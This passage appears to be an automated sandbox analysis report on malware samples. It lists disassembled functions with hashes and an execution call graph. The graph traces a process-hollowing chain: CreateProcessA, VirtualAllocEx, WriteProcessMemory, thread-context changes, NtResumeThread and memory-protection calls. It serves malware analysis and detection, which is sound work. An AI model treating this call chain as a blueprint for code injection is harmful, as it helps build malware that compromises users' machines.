                                                          • Instruction ID: e4824b6163ce08d3babdbdfb084b63ae756acaf91d4ff7ea281bbc3c5f4a9026
                                                          • Opcode Fuzzy Hash: 2c95ff8b06e614a6e0bf0f009412452291f32c1d3c2511d8d6a218b1ed124e78
                                                          • Instruction Fuzzy Hash: C0016D31A002248FCF21EFBA89406AEBBE5EB48214B65147BD80DE7301E735D985CBA1
                                                          Function 02429910 Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: faac381b07d8bbffa66f6cdcd61f27e6b8e956e1755177fd158258c0f687e5f5
                                                          • Instruction ID: d655825047753b437e258b1fc612330f3538aaad28f529c24be22a1f5a24000c
                                                          • Opcode Fuzzy Hash: faac381b07d8bbffa66f6cdcd61f27e6b8e956e1755177fd158258c0f687e5f5
                                                          • Instruction Fuzzy Hash: 7901B931A001048FCB04DF55D98468ABBA5FF80310F64C575D80C5F359D770D90ACBA1
                                                          Function 02428170 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 49323c39ed68161ab5f297e34d9771b4d2f0516384986f9e302001e8d177f0ca
                                                          • Instruction ID: 2c4239413a1545ecc6f731a83a4ae18f936a26ec8bfbbd17791274d761854341
                                                          • Opcode Fuzzy Hash: 49323c39ed68161ab5f297e34d9771b4d2f0516384986f9e302001e8d177f0ca
                                                          • Instruction Fuzzy Hash: C1018F756142458FDB1AEBB4F991E9C3B75EF81304B0046A8C0059F2AADF356A0FD782
                                                          Function 02428180 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2446545430.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2420000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1e434f44fb63234462ffd4c0b12ed0ff73fd70935afcb18cd24c8dafe737c802
                                                          • Instruction ID: f2aa9bf6f1fd5d5ce93b562681373a728682b22e9bd15da749ee57dd331e40d0
                                                          • Opcode Fuzzy Hash: 1e434f44fb63234462ffd4c0b12ed0ff73fd70935afcb18cd24c8dafe737c802
                                                          • Instruction Fuzzy Hash: A0F01D74900109DFDB09EFB4FA45A9D7BB9EF80304F504678C004DB269DB716A0EDB81

                                                          Execution Graph

                                                          Execution Coverage:11.4%
                                                          Dynamic/Decrypted Code Coverage:97.8%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:456
                                                          Total number of Limit Nodes:21
                                                          execution_graph 54576 1306690 54577 13066aa 54576->54577 54579 13066ba 54577->54579 54582 64f89ea 54577->54582 54586 64f5d54 54577->54586 54589 64f3594 54577->54589 54583 64f8a03 54582->54583 54585 64fd0b8 VirtualProtect 54583->54585 54584 64f01dc 54585->54584 54588 64fd0b8 VirtualProtect 54586->54588 54587 64f5d71 54588->54587 54590 64f35ad 54589->54590 54592 64fd0b8 VirtualProtect 54590->54592 54591 64f35d4 54592->54591 54940 6478287 54941 6476f91 54940->54941 54941->54940 54942 6478551 NtProtectVirtualMemory 54941->54942 54942->54941 54947 6476fa6 54948 6476fc8 54947->54948 54950 6478551 NtProtectVirtualMemory 54948->54950 54949 6476f91 54951 6478551 NtProtectVirtualMemory 54949->54951 54950->54949 54951->54949 54602 64fe760 54603 64fe7a4 VirtualAlloc 54602->54603 54605 64fe811 54603->54605 54377 6477edc 54378 6477efe 54377->54378 54380 6478551 NtProtectVirtualMemory 54378->54380 54379 6476f91 54382 6478551 54379->54382 54380->54379 54383 647858d 54382->54383 54387 64786a8 54383->54387 54392 64786b8 54383->54392 54384 64785ca 54384->54379 54388 64786b8 54387->54388 54397 64788b6 54388->54397 54401 64788b8 54388->54401 54389 64786f0 54389->54384 54393 64786cd 54392->54393 54395 64788b6 NtProtectVirtualMemory 54393->54395 54396 64788b8 NtProtectVirtualMemory 54393->54396 54394 64786f0 54394->54384 54395->54394 54396->54394 54398 64788b8 54397->54398 54399 6478915 54398->54399 54405 64790f0 54398->54405 54399->54389 54403 64788df 54401->54403 54402 6478915 54402->54389 54403->54402 54404 64790f0 NtProtectVirtualMemory 54403->54404 54404->54403 54406 6479105 54405->54406 54409 6479973 54406->54409 54410 6479982 54409->54410 54414 6479f08 54410->54414 54426 6479f18 54410->54426 54415 6479f18 54414->54415 54438 647a2c6 54415->54438 54444 647a479 54415->54444 54450 647a39b 54415->54450 54456 647a23b 54415->54456 54462 647a16c 54415->54462 54468 647a52e 54415->54468 54474 647a132 54415->54474 54483 647a332 54415->54483 54489 647a2f3 54415->54489 54427 6479f2d 54426->54427 54429 647a2c6 NtProtectVirtualMemory 54427->54429 54430 647a2f3 NtProtectVirtualMemory 54427->54430 54431 647a332 NtProtectVirtualMemory 54427->54431 54432 647a132 NtProtectVirtualMemory 54427->54432 54433 647a52e NtProtectVirtualMemory 54427->54433 54434 647a16c NtProtectVirtualMemory 54427->54434 54435 647a23b NtProtectVirtualMemory 54427->54435 54436 647a39b NtProtectVirtualMemory 54427->54436 54437 647a479 NtProtectVirtualMemory 54427->54437 54428 6479993 54429->54428 54430->54428 54431->54428 54432->54428 54433->54428 54434->54428 54435->54428 54436->54428 54437->54428 54440 647a0a2 54438->54440 54439 647a0db 54440->54439 54495 647c8ef 54440->54495 54500 647c938 54440->54500 54504 647c948 54440->54504 54446 647a0a2 54444->54446 54445 647a0db 54446->54445 54447 647c8ef NtProtectVirtualMemory 54446->54447 54448 647c948 NtProtectVirtualMemory 54446->54448 54449 647c938 NtProtectVirtualMemory 54446->54449 54447->54446 54448->54446 54449->54446 54451 647a0a2 54450->54451 54452 647a0db 54451->54452 54453 647c8ef NtProtectVirtualMemory 54451->54453 54454 647c948 NtProtectVirtualMemory 54451->54454 54455 647c938 NtProtectVirtualMemory 54451->54455 54452->54452 54453->54451 54454->54451 54455->54451 54458 647a0a2 54456->54458 54457 647a0db 54458->54457 54459 647c8ef NtProtectVirtualMemory 54458->54459 54460 647c948 NtProtectVirtualMemory 54458->54460 54461 647c938 NtProtectVirtualMemory 54458->54461 54459->54458 54460->54458 54461->54458 54463 647a0a2 54462->54463 54464 647a0db 54463->54464 54465 647c8ef NtProtectVirtualMemory 54463->54465 54466 647c948 NtProtectVirtualMemory 54463->54466 54467 647c938 NtProtectVirtualMemory 54463->54467 54464->54464 54465->54463 54466->54463 54467->54463 54469 647a0a2 54468->54469 54470 647a0db 54469->54470 54471 647c8ef NtProtectVirtualMemory 54469->54471 54472 647c948 NtProtectVirtualMemory 54469->54472 54473 647c938 NtProtectVirtualMemory 54469->54473 54470->54470 54471->54469 54472->54469 54473->54469 54475 647a141 54474->54475 54528 647aa41 54475->54528 54533 647aa50 54475->54533 54476 647a09c 54477 647a0db 54476->54477 54478 647c8ef NtProtectVirtualMemory 54476->54478 54479 647c948 NtProtectVirtualMemory 54476->54479 54480 647c938 NtProtectVirtualMemory 54476->54480 54477->54477 54478->54476 54479->54476 54480->54476 54485 647a0a2 54483->54485 54484 647a0db 54485->54484 54486 647c8ef NtProtectVirtualMemory 54485->54486 54487 647c948 NtProtectVirtualMemory 54485->54487 54488 647c938 NtProtectVirtualMemory 54485->54488 54486->54485 54487->54485 54488->54485 54491 647a0a2 54489->54491 54490 647a0db 54491->54490 54492 647c8ef NtProtectVirtualMemory 54491->54492 54493 647c948 NtProtectVirtualMemory 54491->54493 54494 647c938 NtProtectVirtualMemory 54491->54494 54492->54491 54493->54491 54494->54491 54496 647c956 54495->54496 54498 647c8fa 54495->54498 54497 647c973 54496->54497 54508 647ccdb 54496->54508 54497->54440 54498->54440 54501 647c948 54500->54501 54502 647c973 54501->54502 54503 647ccdb NtProtectVirtualMemory 54501->54503 54502->54440 54503->54502 54505 647c95d 54504->54505 54506 647c973 54505->54506 54507 647ccdb NtProtectVirtualMemory 54505->54507 54506->54440 54507->54506 54509 647cce1 54508->54509 54513 647d568 54509->54513 54519 647d559 54509->54519 54510 647ca1f 54514 647d57a 54513->54514 54516 647d559 NtProtectVirtualMemory 54514->54516 54517 647d598 NtProtectVirtualMemory 54514->54517 54518 647d5a8 NtProtectVirtualMemory 54514->54518 54515 647d58d 54515->54510 54516->54515 54517->54515 54518->54515 54520 647d562 54519->54520 54523 647d5c2 54519->54523 54524 647d559 NtProtectVirtualMemory 54520->54524 54525 647d598 NtProtectVirtualMemory 54520->54525 54526 647d5a8 NtProtectVirtualMemory 54520->54526 54521 647d58d 54521->54510 54522 647d76a 54522->54510 54523->54522 54527 647d821 NtProtectVirtualMemory 54523->54527 54524->54521 54525->54521 54526->54521 54527->54523 54529 647aa50 54528->54529 54538 647aa88 54529->54538 54542 647aa98 54529->54542 54530 647aa7a 54530->54476 54534 647aa67 54533->54534 54536 647aa88 NtProtectVirtualMemory 54534->54536 54537 647aa98 NtProtectVirtualMemory 54534->54537 54535 647aa7a 54535->54476 54536->54535 54537->54535 54539 647aa98 54538->54539 54546 647b3d1 54539->54546 54543 647aabb 54542->54543 54545 647b3d1 NtProtectVirtualMemory 54543->54545 54544 647ab5e 54544->54530 54545->54544 54547 647b3f7 54546->54547 54549 647b510 NtProtectVirtualMemory 54547->54549 54550 647b520 NtProtectVirtualMemory 54547->54550 54548 647ab5e 54548->54530 54549->54548 54550->54548 54551 12bd030 54552 12bd048 54551->54552 54553 12bd0a3 54552->54553 54555 64fdc80 54552->54555 54556 64fdcd9 54555->54556 54559 64fe210 54556->54559 54557 64fdd0e 54560 64fe23d 54559->54560 54563 64fe3d3 54560->54563 54564 64fd0b8 54560->54564 54563->54557 54566 64fd0df 54564->54566 54568 64fd598 54566->54568 54569 64fd5e1 VirtualProtect 54568->54569 54571 64fd19c 54569->54571 54571->54557 54606 6458878 54607 645887d 54606->54607 54612 6458a75 54607->54612 54617 64588b8 54607->54617 54622 64588a8 54607->54622 54608 64588a3 54614 645890f 54612->54614 54613 645892a 54613->54608 54614->54613 54627 6459c20 54614->54627 54643 6459bd2 54614->54643 54619 64588e2 54617->54619 54618 645892a 54618->54608 54619->54618 54620 6459c20 11 API calls 54619->54620 54621 6459bd2 11 API calls 54619->54621 54620->54619 54621->54619 54624 64588e2 54622->54624 54623 645892a 54623->54608 54624->54623 54625 6459c20 11 API calls 54624->54625 54626 6459bd2 11 API calls 54624->54626 54625->54624 54626->54624 54628 6459c2a 54627->54628 54631 6459c2e 54627->54631 54629 6459beb 54628->54629 54628->54631 54634 6459c20 11 API calls 54629->54634 54656 6459f3d 54629->54656 54659 6459e6d 54629->54659 54662 6459de2 54629->54662 54665 6459d62 54629->54665 54668 645a150 54629->54668 54671 6459c30 54629->54671 54674 645a0b8 54629->54674 54677 645a035 54629->54677 54680 6459d65 54629->54680 54630 6459c17 54630->54614 54683 645a3a1 54631->54683 54634->54630 54644 6459bf5 54643->54644 54646 6459d65 11 API calls 54644->54646 54647 645a035 11 API calls 54644->54647 54648 6459c20 11 API calls 54644->54648 54649 6459c30 11 API calls 54644->54649 54650 645a150 11 API calls 54644->54650 54651 6459d62 11 API calls 54644->54651 54652 6459de2 11 API calls 54644->54652 54653 6459e6d 11 API calls 54644->54653 54654 6459f3d 11 API calls 54644->54654 54655 645a0b8 11 API calls 54644->54655 54645 6459c17 54645->54614 54646->54645 54647->54645 54648->54645 54649->54645 54650->54645 54651->54645 54652->54645 54653->54645 54654->54645 54655->54645 54657 6459c95 54656->54657 54658 645a3a1 11 API calls 54657->54658 54658->54657 54660 6459c95 54659->54660 54661 645a3a1 11 API calls 54660->54661 54661->54660 54663 6459c95 54662->54663 54664 645a3a1 11 API calls 54663->54664 54664->54663 54666 6459c95 54665->54666 54667 645a3a1 11 API calls 54666->54667 54667->54666 54669 6459c95 54668->54669 54670 645a3a1 11 API calls 54669->54670 54670->54669 54672 6459c43 54671->54672 54673 645a3a1 11 API calls 54672->54673 54673->54672 54675 6459c95 54674->54675 54676 645a3a1 11 API calls 54675->54676 54676->54675 54678 6459c95 54677->54678 54679 645a3a1 11 API calls 54678->54679 54679->54678 54681 6459c95 54680->54681 54682 645a3a1 11 API calls 54681->54682 54682->54681 54684 645a3c5 54683->54684 54716 645a4c4 54684->54716 54720 645acf9 54684->54720 54724 645b1bc 54684->54724 54728 645b2f3 54684->54728 54732 645a9b0 54684->54732 54738 645a536 54684->54738 54743 645b1f4 54684->54743 54747 645a86a 54684->54747 54752 645aa20 54684->54752 54760 645af67 54684->54760 54764 645ab64 54684->54764 54768 645a965 54684->54768 54772 645b0db 54684->54772 54776 645b01c 54684->54776 54780 645a512 54684->54780 54784 645aa93 54684->54784 54789 645ad53 54684->54789 54797 645af11 54684->54797 54801 645b217 54684->54801 54805 645ac95 54684->54805 54809 645b3ca 54684->54809 54813 645a8ca 54684->54813 54821 645ae08 54684->54821 54828 645abce 54684->54828 54836 645a58e 54684->54836 54840 645b38f 54684->54840 54844 645b14d 54684->54844 54848 645b34d 54684->54848 54852 645b443 54684->54852 54859 645ab47 54684->54859 54685 645a3e7 54685->54631 54717 645a4d5 54716->54717 54863 647e921 54717->54863 54867 647e928 54717->54867 54721 645a51e 54720->54721 54722 647e921 Wow64SetThreadContext 54721->54722 54723 647e928 Wow64SetThreadContext 54721->54723 54722->54721 54723->54721 54725 645a51e 54724->54725 54726 647e921 Wow64SetThreadContext 54725->54726 54727 647e928 Wow64SetThreadContext 54725->54727 54726->54725 54727->54725 54729 645a51e 54728->54729 54730 647e921 Wow64SetThreadContext 54729->54730 54731 647e928 Wow64SetThreadContext 54729->54731 54730->54729 54731->54729 54871 645cff0 54732->54871 54876 645cfdf 54732->54876 54733 645a51e 54734 647e921 Wow64SetThreadContext 54733->54734 54735 647e928 Wow64SetThreadContext 54733->54735 54734->54733 54735->54733 54739 645a54e 54738->54739 54881 645b988 54739->54881 54885 645b998 54739->54885 54740 645a566 54744 645a51e 54743->54744 54745 647e921 Wow64SetThreadContext 54744->54745 54746 647e928 Wow64SetThreadContext 54744->54746 54745->54744 54746->54744 54748 645a874 54747->54748 54901 645d078 54748->54901 54906 645d088 54748->54906 54749 645aafe 54749->54685 54753 645a51e 54752->54753 54754 645aab9 54752->54754 54756 647e921 Wow64SetThreadContext 54753->54756 54757 647e928 Wow64SetThreadContext 54753->54757 54758 645d078 2 API calls 54754->54758 54759 645d088 2 API calls 54754->54759 54755 645aafe 54755->54685 54756->54753 54757->54753 54758->54755 54759->54755 54761 645a51e 54760->54761 54762 647e921 Wow64SetThreadContext 54761->54762 54763 647e928 Wow64SetThreadContext 54761->54763 54762->54761 54763->54761 54765 645a51e 54764->54765 54766 647e921 Wow64SetThreadContext 54765->54766 54767 647e928 Wow64SetThreadContext 54765->54767 54766->54765 54767->54765 54769 645a51e 54768->54769 54770 647e921 Wow64SetThreadContext 54769->54770 54771 647e928 Wow64SetThreadContext 54769->54771 54770->54769 54771->54769 54773 645a51e 54772->54773 54774 647e921 Wow64SetThreadContext 54773->54774 54775 647e928 Wow64SetThreadContext 54773->54775 54774->54773 54775->54773 54777 645a51e 54776->54777 54778 647e921 Wow64SetThreadContext 54777->54778 54779 647e928 Wow64SetThreadContext 54777->54779 54778->54777 54779->54777 54781 645a51e 54780->54781 54782 647e921 Wow64SetThreadContext 54781->54782 54783 647e928 Wow64SetThreadContext 54781->54783 54782->54781 54783->54781 54785 645aa9d 54784->54785 54787 645d078 2 API calls 54785->54787 54788 645d088 2 API calls 54785->54788 54786 645aafe 54786->54685 54787->54786 54788->54786 54790 645ad72 54789->54790 54919 647efe0 54790->54919 54923 647efe8 54790->54923 54791 645acb7 54792 645a51e 54792->54791 54795 647e921 Wow64SetThreadContext 54792->54795 54796 647e928 Wow64SetThreadContext 54792->54796 54795->54792 54796->54792 54798 645a51e 54797->54798 54799 647e921 Wow64SetThreadContext 54798->54799 54800 647e928 Wow64SetThreadContext 54798->54800 54799->54798 54800->54798 54802 645a51e 54801->54802 54803 647e921 Wow64SetThreadContext 54802->54803 54804 647e928 Wow64SetThreadContext 54802->54804 54803->54802 54804->54802 54806 645a51e 54805->54806 54807 647e921 Wow64SetThreadContext 54806->54807 54808 647e928 Wow64SetThreadContext 54806->54808 54807->54806 54808->54806 54810 645a51e 54809->54810 54811 647e921 Wow64SetThreadContext 54810->54811 54812 647e928 Wow64SetThreadContext 54810->54812 54811->54810 54812->54810 54814 645a8d4 54813->54814 54815 645a51e 54814->54815 54927 647f1af 54814->54927 54932 647f200 54814->54932 54936 647f1f9 54814->54936 54816 647e921 Wow64SetThreadContext 54815->54816 54817 647e928 Wow64SetThreadContext 54815->54817 54816->54815 54817->54815 54822 645ae28 54821->54822 54826 647efe0 WriteProcessMemory 54822->54826 54827 647efe8 WriteProcessMemory 54822->54827 54823 645a51e 54824 647e921 Wow64SetThreadContext 54823->54824 54825 647e928 Wow64SetThreadContext 54823->54825 54824->54823 54825->54823 54826->54823 54827->54823 54829 645a51e 54828->54829 54830 645a8f0 54828->54830 54834 647e921 Wow64SetThreadContext 54829->54834 54835 647e928 Wow64SetThreadContext 54829->54835 54830->54828 54831 647f200 NtResumeThread 54830->54831 54832 647f1af NtResumeThread 54830->54832 54833 647f1f9 NtResumeThread 54830->54833 54831->54830 54832->54830 54833->54830 54834->54829 54835->54829 54837 645a51e 54836->54837 54838 647e921 Wow64SetThreadContext 54837->54838 54839 647e928 Wow64SetThreadContext 54837->54839 54838->54837 54839->54837 54841 645a51e 54840->54841 54842 647e921 Wow64SetThreadContext 54841->54842 54843 647e928 Wow64SetThreadContext 54841->54843 54842->54841 54843->54841 54845 645a51e 54844->54845 54846 647e921 Wow64SetThreadContext 54845->54846 54847 647e928 Wow64SetThreadContext 54845->54847 54846->54845 54847->54845 54849 645a51e 54848->54849 54850 647e921 Wow64SetThreadContext 54849->54850 54851 647e928 Wow64SetThreadContext 54849->54851 54850->54849 54851->54849 54853 645b45b 54852->54853 54857 647efe0 WriteProcessMemory 54853->54857 54858 647efe8 WriteProcessMemory 54853->54858 54854 645a51e 54855 647e921 Wow64SetThreadContext 54854->54855 54856 647e928 Wow64SetThreadContext 54854->54856 54855->54854 54856->54854 54857->54854 54858->54854 54860 645a51e 54859->54860 54861 647e921 Wow64SetThreadContext 54860->54861 54862 647e928 Wow64SetThreadContext 54860->54862 54861->54860 54862->54860 54864 647e971 Wow64SetThreadContext 54863->54864 54866 647e9e9 54864->54866 54866->54717 54868 647e971 Wow64SetThreadContext 54867->54868 54870 647e9e9 54868->54870 54870->54717 54872 645d005 54871->54872 54874 647e921 Wow64SetThreadContext 54872->54874 54875 647e928 Wow64SetThreadContext 54872->54875 54873 645d01e 54873->54733 54874->54873 54875->54873 54877 645d005 54876->54877 54879 647e921 Wow64SetThreadContext 54877->54879 54880 647e928 Wow64SetThreadContext 54877->54880 54878 645d01e 54878->54733 54879->54878 54880->54878 54882 645b998 54881->54882 54883 645b9d1 54882->54883 54889 645bc45 54882->54889 54883->54740 54886 645b9af 54885->54886 54887 645bc45 2 API calls 54886->54887 54888 645b9d1 54886->54888 54887->54888 54888->54740 54893 647e564 54889->54893 54897 647e570 54889->54897 54894 647e570 CreateProcessA 54893->54894 54896 647e7ec 54894->54896 54899 647e5f0 CreateProcessA 54897->54899 54900 647e7ec 54899->54900 54902 645d09d 54901->54902 54911 647ee81 54902->54911 54915 647ee88 54902->54915 54903 645d0bf 54903->54749 54907 645d09d 54906->54907 54909 647ee81 VirtualAllocEx 54907->54909 54910 647ee88 VirtualAllocEx 54907->54910 54908 645d0bf 54908->54749 54909->54908 54910->54908 54912 647ee88 VirtualAllocEx 54911->54912 54914 647ef44 54912->54914 54914->54903 54916 647eecc VirtualAllocEx 54915->54916 54918 647ef44 54916->54918 54918->54903 54920 647efe8 WriteProcessMemory 54919->54920 54922 647f0cd 54920->54922 54922->54792 54924 647f034 WriteProcessMemory 54923->54924 54926 647f0cd 54924->54926 54926->54792 54928 647f224 NtResumeThread 54927->54928 54930 647f1ba 54927->54930 54931 647f2a0 54928->54931 54930->54814 54931->54814 54933 647f249 NtResumeThread 54932->54933 54935 647f2a0 54933->54935 54935->54814 54937 647f200 NtResumeThread 54936->54937 54939 647f2a0 54937->54939 54939->54814 54961 6451638 54962 645164d 54961->54962 54966 6451746 54962->54966 54971 64517c6 54962->54971 54963 6451663 54967 645176a 54966->54967 54968 6451a81 54967->54968 54969 647f4d1 VirtualProtect 54967->54969 54970 647f4d8 VirtualProtect 54967->54970 54968->54963 54969->54967 54970->54967 54972 64517cc 54971->54972 54973 6451a81 54972->54973 54974 647f4d1 VirtualProtect 54972->54974 54975 647f4d8 VirtualProtect 54972->54975 54973->54963 54974->54972 54975->54972 54572 64771d8 54573 64771fa 54572->54573 54575 6478551 NtProtectVirtualMemory 54573->54575 54574 647723f 54575->54574

                                                          Executed Functions

                                                          Function 06422467 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                          • API String ID: 0-324474496
                                                          • Opcode ID: 364faf3badfe83e969418018cf7ad9ea08bf283beaca98c631d036bc5ba53ef9
                                                          • Instruction ID: 3dfead8da32fbed18bb5fac8e8fb36841adb4891d4a0010a8c1092939a465a0a
                                                          • Opcode Fuzzy Hash: 364faf3badfe83e969418018cf7ad9ea08bf283beaca98c631d036bc5ba53ef9
                                                          • Instruction Fuzzy Hash: 82223D30A00229CFDB65DF64C994BAEB7B2BF48704F64819AD509AB3A5DB70DD81CF50
                                                          Function 0130A9C0 Relevance: 7.2, Strings: 5, Instructions: 983COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 591 130a9c0-130a9e1 592 130a9e3 591->592 593 130a9e8-130aacf 591->593 592->593 595 130b1d1-130b1f9 593->595 596 130aad5-130ac16 call 1306da0 593->596 599 130b8ff-130b908 595->599 642 130b19a-130b1c4 596->642 643 130ac1c-130ac77 596->643 601 130b207-130b211 599->601 602 130b90e-130b925 599->602 603 130b213 601->603 604 130b218-130b30c call 1306da0 601->604 603->604 624 130b336 604->624 625 130b30e-130b31a 604->625 629 130b33c-130b35c 624->629 627 130b324-130b32a 625->627 628 130b31c-130b322 625->628 630 130b334 627->630 628->630 633 130b3bc-130b43c 629->633 634 130b35e-130b3b7 629->634 630->629 656 130b493-130b4d6 call 1306da0 633->656 657 130b43e-130b491 633->657 646 130b8fc 634->646 653 130b1c6 642->653 654 130b1ce 642->654 650 130ac79 643->650 651 130ac7c-130ac87 643->651 646->599 650->651 655 130b0af-130b0b5 651->655 653->654 654->595 659 130b0bb-130b137 call 1300e74 655->659 660 130ac8c-130acaa 655->660 681 130b4e1-130b4ea 656->681 657->681 702 130b184-130b18a 659->702 662 130ad01-130ad16 660->662 663 130acac-130acb0 660->663 666 130ad18 662->666 667 130ad1d-130ad33 662->667 663->662 668 130acb2-130acbd 663->668 666->667 671 130ad35 667->671 672 130ad3a-130ad51 667->672 673 130acf3-130acf9 668->673 671->672 678 130ad53 672->678 679 130ad58-130ad6e 672->679 676 130acfb-130acfc 673->676 677 130acbf-130acc3 673->677 680 130ad7f-130adea 676->680 682 130acc5 677->682 683 130acc9-130ace1 677->683 678->679 684 130ad70 679->684 685 130ad75-130ad7c 679->685 687 130adec-130adf8 680->687 688 130adfe-130afb3 680->688 690 130b54a-130b559 681->690 682->683 691 130ace3 683->691 692 130ace8-130acf0 683->692 684->685 685->680 687->688 700 130afb5-130afb9 688->700 701 130b017-130b02c 688->701 693 130b55b-130b5e3 690->693 694 130b4ec-130b514 690->694 691->692 692->673 729 130b75c-130b768 693->729 697 130b516 694->697 698 130b51b-130b544 694->698 697->698 698->690 700->701 705 130afbb-130afca 700->705 703 130b033-130b054 701->703 704 130b02e 701->704 707 130b139-130b181 702->707 708 130b18c-130b192 702->708 709 130b056 703->709 710 130b05b-130b07a 703->710 704->703 712 130b009-130b00f 705->712 707->702 708->642 709->710 713 130b081-130b0a1 710->713 714 130b07c 710->714 716 130b011-130b012 712->716 717 130afcc-130afd0 712->717 722 130b0a3 713->722 723 130b0a8 713->723 714->713 724 130b0ac 716->724 720 130afd2-130afd6 717->720 721 130afda-130affb 717->721 720->721 725 130b002-130b006 721->725 726 130affd 721->726 722->723 723->724 724->655 725->712 726->725 731 130b5e8-130b5f1 729->731 732 130b76e-130b7c9 729->732 733 130b5f3 731->733 734 130b5fa-130b750 731->734 747 130b800-130b82a 732->747 748 130b7cb-130b7fe 732->748 733->734 736 130b600-130b640 733->736 737 130b645-130b685 733->737 738 130b68a-130b6ca 733->738 739 130b6cf-130b70f 733->739 750 130b756 734->750 736->750 737->750 738->750 739->750 756 130b833-130b8c6 747->756 748->756 750->729 760 130b8cd-130b8ed 756->760 760->646
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2446014812.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1300000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RZW+$TJbq$Te]q$paq$xb`q
                                                          • API String ID: 0-4120908068
                                                          • Opcode ID: 03e8d194cc1f50bb2d3245eb8fa3253a7ae04a741fb70c213e517ab62af92d11
                                                          • Instruction ID: 03d490e58fc8a4330ca0771f2367b077642a237b9f42cc07d486750c46145807
                                                          • Opcode Fuzzy Hash: 03e8d194cc1f50bb2d3245eb8fa3253a7ae04a741fb70c213e517ab62af92d11
                                                          • Instruction Fuzzy Hash: B0A2D574A00228CFDB65CF69C994A99BBF2FF89304F1581E9D509AB365DB319E81CF40
                                                          Function 06425750 Relevance: 3.1, Strings: 2, Instructions: 639COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1714 6425750-642576a 1715 6425776-6425782 1714->1715 1716 642576c-6425773 1714->1716 1718 6425784-6425791 1715->1718 1719 64257de-64257e1 1715->1719 1726 6425797-64257c7 1718->1726 1727 64259af-64259e7 1718->1727 1720 64257e3-64257e5 1719->1720 1721 64257f4-64257f7 1719->1721 1725 64257ed 1720->1725 1723 64257f9-6425817 1721->1723 1724 642581d-6425820 1721->1724 1723->1724 1733 64259ee-6425a39 1723->1733 1728 6425826-642582c 1724->1728 1729 64259a5-64259ac 1724->1729 1725->1721 1757 64257d4-64257d7 1726->1757 1758 64257c9-64257d2 1726->1758 1727->1733 1728->1729 1731 6425832-642583b 1728->1731 1739 6425873-6425879 1731->1739 1740 642583d-642584c 1731->1740 1762 6425a72-6425a74 1733->1762 1763 6425a3b-6425a48 1733->1763 1741 6425984-642598a 1739->1741 1742 642587f-6425888 1739->1742 1740->1739 1748 642584e-6425867 1740->1748 1741->1729 1744 642598c-642599c 1741->1744 1742->1741 1753 642588e-642589a 1742->1753 1744->1729 1756 642599e-64259a3 1744->1756 1748->1739 1759 6425869-642586c 1748->1759 1764 64258a0-64258c8 1753->1764 1765 6425938-642597c 1753->1765 1756->1729 1757->1719 1758->1719 1759->1739 1766 6425ebf-6425ec6 1762->1766 1763->1762 1770 6425a4a-6425a70 1763->1770 1764->1765 1777 64258ca-6425907 1764->1777 1765->1741 1770->1762 1782 6425a79-6425aad 1770->1782 1777->1765 1789 6425909-6425936 1777->1789 1790 6425ab3-6425abc 1782->1790 1791 6425b50-6425b5f 1782->1791 1789->1741 1793 6425ac2-6425ad5 1790->1793 1794 6425ec7-6425ed3 1790->1794 1799 6425b61-6425b77 1791->1799 1800 6425b9e 1791->1800 1802 6425ad7-6425af0 1793->1802 1803 6425b3e-6425b4a 1793->1803 1809 6425b97-6425b9c 1799->1809 1810 6425b79-6425b95 1799->1810 1801 6425ba0-6425ba5 1800->1801 1804 6425ba7-6425bc8 1801->1804 1805 6425be8-6425c04 1801->1805 1802->1803 1819 6425af2-6425b00 1802->1819 1803->1790 1803->1791 1804->1805 1823 6425bca 1804->1823 1815 6425c0a-6425c13 1805->1815 1816 6425ccc-6425cd5 1805->1816 1809->1801 1810->1801 1815->1794 1822 6425c19-6425c36 1815->1822 1820 6425cdb 1816->1820 1821 6425ebd 1816->1821 1819->1803 1834 6425b02-6425b06 1819->1834 1824 6425ce2-6425ce4 1820->1824 1825 6425d46-6425d54 call 6423170 1820->1825 1826 6425ce9-6425cf7 call 6423170 1820->1826 1821->1766 1844 6425cba-6425cc6 1822->1844 1845 6425c3c-6425c52 1822->1845 1830 6425bcd-6425be6 1823->1830 1824->1766 1838 6425d56-6425d5c 1825->1838 1839 6425d6c-6425d6f 1825->1839 1835 6425cf9-6425cff 1826->1835 1836 6425d0f-6425d12 1826->1836 1830->1805 1834->1794 1841 